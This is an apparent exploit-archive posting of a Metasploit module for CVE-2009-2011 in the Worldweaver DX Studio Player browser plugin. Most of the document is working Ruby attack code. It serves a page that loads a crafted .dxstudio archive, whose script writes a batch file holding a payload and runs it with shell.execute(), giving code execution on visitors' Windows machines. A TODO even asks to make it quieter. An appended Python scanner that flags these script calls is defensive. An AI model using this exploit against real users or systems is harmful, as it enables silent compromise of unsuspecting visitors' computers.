Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution

Posted Feb 17, 2010
Authored by jduck | Site metasploit.com

This Metasploit module exploits a command execution vulnerability within the DX Studio Player from Worldweaver. The player is a browser plugin for IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web page referring to a specially crafted .dxstudio document, an attacker can execute arbitrary commands. Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow the plug-in to access local files. This prompt appears to occur only once per server host. NOTE: This exploit uses additionally dangerous script features to write to local files!

tags | exploit, web, arbitrary, local, activex
systems | windows, xp
advisories | CVE-2009-2011
MD5 | a5e34c10bb1819af3e1f8e7223de5072

##
# $Id: dxstudio_player_exec.rb 8541 2010-02-17 20:14:40Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution',
      'Description'    => %q{
          This module exploits a command execution vulnerability within the
        DX Studio Player from Worldweaver. The player is a browser plugin for
        IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web
        page referring to a specially crafted .dxstudio document, an attacker can
        execute arbitrary commands.

        Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and
        IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow
        the plug-in to access local files. This prompt appears to occur only once per
        server host.

        NOTE: This exploit uses additionally dangerous script features to write to
        local files!
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'Version'        => '$Revision: 8541 $',
      'References'     =>
        [
          [ 'CVE', '2009-2011' ],
          [ 'BID', '35273' ],
          [ 'OSVDB', '54969' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/8922' ],
          [ 'URL', 'http://dxstudio.com/guide.aspx' ]
        ],
      'Payload'        =>
        {
          'Space' => 2048,
        },
      'Platform'       => 'win',
      # 'Arch'         => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Jun 09 2009',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)

    # Build the URL the browser will use to fetch the .dxstudio document
    url_base  = "http://"
    url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url_base += ":" + datastore['SRVPORT'].to_s + get_resource()

    payload_url = url_base + "/payload"

    # handle request for the payload
    if (request.uri.match(/payload/))

      # build the payload
      return if ((p = regenerate_payload(cli)) == nil)
      data = Msf::Util::EXE.to_win32pe(framework, p.encoded)

      # turn the payload into batch-file lines written by the document's script
      cmds = generate_cmdstager({}, 2047, p)
      scr = ""
      cmds.each_line { |ln|
        ln.chomp!
        scr << " f.writeString('"
        scr << ln
        scr << "\\n');\n"
      }

      # make header.xml
      hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
      hdrxml.gsub!(/CMDS/, scr)
      bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
      hdrxml.gsub!(/BATNAME/, bat_name)

      # craft the zip archive (a .dxstudio document is a zip holding header.xml)
      zip = Rex::Zip::Archive.new
      zip.add_file("header.xml", hdrxml)
      data = zip.pack

      print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

      # Handle the payload
      # handler(cli)
      return
    end

    # otherwise, send the html..
    html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|

    print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...")
    # Transmit the compressed response to the client
    html.gsub!(/DXURL/, payload_url)
    send_response(cli, html, { 'Content-Type' => 'text/html' })

  end
end

=begin
TODO:
- make it more quiet
- auto-migrate?
=end
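The module above shows what a malicious .dxstudio document looks like: a zip archive whose header.xml carries a script that opens a local file with system.file.openWrite(), writes batch lines with writeString() and then calls shell.execute(). The following Python scanner is an added defender-side example, not part of the Metasploit module or of DX Studio; it assumes only the layout the module shows (a zip containing header.xml with a <script> CDATA block) and flags those exact script calls so a mail or web gateway can quarantine such documents before a vulnerable plugin ever opens them.

```python
# Added example: scan a .dxstudio document for script calls that reach the
# local shell or filesystem. Layout assumed from the module above: a zip
# archive containing header.xml with a <script><![CDATA[...]]></script> block.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Call names taken from the module's header.xml template; any of them lets a
# document leave the player's sandbox, so each is treated as a red flag.
SUSPICIOUS_CALLS = ("shell.execute", "system.file.openWrite", "writeString")


def scan_dxstudio(blob: bytes) -> dict:
    """Return {'has_script': bool, 'calls': [...], 'verdict': str} for one document."""
    result = {"has_script": False, "calls": [], "verdict": "clean"}
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        result["verdict"] = "not-a-zip"  # not a DX Studio document at all
        return result
    if "header.xml" not in zf.namelist():
        result["verdict"] = "no-header"
        return result
    try:
        root = ET.fromstring(zf.read("header.xml"))
    except ET.ParseError:
        result["verdict"] = "malformed-xml"  # unparsable: do not trust it
        return result
    # ElementTree returns CDATA content as the element's plain .text.
    for script in root.iter("script"):
        result["has_script"] = True
        text = script.text or ""
        for call in SUSPICIOUS_CALLS:
            if re.search(re.escape(call) + r"\s*\(", text):
                result["calls"].append(call)
    if "shell.execute" in result["calls"]:
        result["verdict"] = "shell-execution"
    elif result["calls"]:
        result["verdict"] = "file-write"
    return result


def make_sample(script: str) -> bytes:
    """Build a constructed .dxstudio-style zip around SCRIPT (test input only)."""
    xml = ('<?xml version="1.0"?>\n<dxstudio>\n<script><![CDATA['
           + script + ']]></script>\n</dxstudio>\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("header.xml", xml)
    return buf.getvalue()
```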
